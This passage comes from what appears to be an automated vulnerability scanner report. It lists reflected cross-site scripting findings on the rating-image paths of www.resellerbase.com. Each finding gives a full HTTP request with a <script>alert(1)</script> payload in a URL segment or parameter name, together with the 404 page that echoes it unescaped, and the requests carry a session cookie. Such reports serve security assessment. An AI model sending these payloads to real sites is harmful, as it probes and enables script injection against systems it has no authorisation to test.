GET /web-service/themes/kosmos/images/rating/2half.gif?2d57e<script>alert(1)</script>a1e985cd575=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating/2half.gif?2d57e<script>alert(1)</script>a1e985cd575=1 was not found on this server.</p>
...[SNIP]...

2.5406. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/3.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6b955<script>alert(1)</script>5bd1fabd981 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service6b955<script>alert(1)</script>5bd1fabd981/themes/kosmos/images/rating/3.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service6b955<script>alert(1)</script>5bd1fabd981/themes/kosmos/images/rating/3.gif was not found on this server.</p>
...[SNIP]...

2.5407. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/3.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 67a96<script>alert(1)</script>c7cefc704d4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes67a96<script>alert(1)</script>c7cefc704d4/kosmos/images/rating/3.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes67a96<script>alert(1)</script>c7cefc704d4/kosmos/images/rating/3.gif was not found on this server.</p>
...[SNIP]...

2.5408. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/3.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7cc7e<script>alert(1)</script>9a538b3b452 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos7cc7e<script>alert(1)</script>9a538b3b452/images/rating/3.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos7cc7e<script>alert(1)</script>9a538b3b452/images/rating/3.gif was not found on this server.</p>
...[SNIP]...

2.5409. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/3.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8c96d<script>alert(1)</script>04f45c9253 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images8c96d<script>alert(1)</script>04f45c9253/rating/3.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images8c96d<script>alert(1)</script>04f45c9253/rating/3.gif was not found on this server.</p>
...[SNIP]...

2.5410. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/3.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d96d4<script>alert(1)</script>a6691086a10 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/ratingd96d4<script>alert(1)</script>a6691086a10/3.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:52:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/ratingd96d4<script>alert(1)</script>a6691086a10/3.gif was not found on this server.</p>
...[SNIP]...

2.5411. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/3.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 2a3b0<script>alert(1)</script>7e879b2e10 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating/3.gif2a3b0<script>alert(1)</script>7e879b2e10 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:52:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating/3.gif2a3b0<script>alert(1)</script>7e879b2e10 was not found on this server.</p>
...[SNIP]...

2.5412. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/3.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/3.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e0030<script>alert(1)</script>cc7d6575d83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating/3.gif?e0030<script>alert(1)</script>cc7d6575d83=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating/3.gif?e0030<script>alert(1)</script>cc7d6575d83=1 was not found on this server.</p>
...[SNIP]...

2.5413. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/3half.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a20fc<script>alert(1)</script>ac64bc8bb09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicea20fc<script>alert(1)</script>ac64bc8bb09/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicea20fc<script>alert(1)</script>ac64bc8bb09/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5414. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/3half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b8803<script>alert(1)</script>549bc4b9a38 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themesb8803<script>alert(1)</script>549bc4b9a38/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themesb8803<script>alert(1)</script>549bc4b9a38/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5415. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/3half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ae88f<script>alert(1)</script>22e7cc9468f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmosae88f<script>alert(1)</script>22e7cc9468f/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmosae88f<script>alert(1)</script>22e7cc9468f/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5416. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/3half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 356b9<script>alert(1)</script>64df9ea5b01 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images356b9<script>alert(1)</script>64df9ea5b01/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images356b9<script>alert(1)</script>64df9ea5b01/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5417. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/3half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 9e453<script>alert(1)</script>ac26e257fda was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating9e453<script>alert(1)</script>ac26e257fda/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating9e453<script>alert(1)</script>ac26e257fda/3half.gif was not found on this server.</p>
...[SNIP]...

2.5418. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/3half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f3482<script>alert(1)</script>e6ac0f31f7f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating/3half.giff3482<script>alert(1)</script>e6ac0f31f7f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:52:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating/3half.giff3482<script>alert(1)</script>e6ac0f31f7f was not found on this server.</p>
...[SNIP]...

2.5419. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/3half.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/3half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 79d9d<script>alert(1)</script>25313d78532 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating/3half.gif?79d9d<script>alert(1)</script>25313d78532=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating/3half.gif?79d9d<script>alert(1)</script>25313d78532=1 was not found on this server.</p>
...[SNIP]...

2.5420. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/4half.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e79f2<script>alert(1)</script>e451470d940 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicee79f2<script>alert(1)</script>e451470d940/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicee79f2<script>alert(1)</script>e451470d940/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.5421. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/4half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload aef59<script>alert(1)</script>c3fcd920354 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themesaef59<script>alert(1)</script>c3fcd920354/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themesaef59<script>alert(1)</script>c3fcd920354/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.5422. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/4half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ed30a<script>alert(1)</script>43ed4aa269 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmosed30a<script>alert(1)</script>43ed4aa269/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmosed30a<script>alert(1)</script>43ed4aa269/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.5423. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/4half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dbbd7<script>alert(1)</script>3e5a29473d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/imagesdbbd7<script>alert(1)</script>3e5a29473d/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/imagesdbbd7<script>alert(1)</script>3e5a29473d/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.5424. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/4half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 990e9<script>alert(1)</script>2c59954aee8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating990e9<script>alert(1)</script>2c59954aee8/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:34 GMT
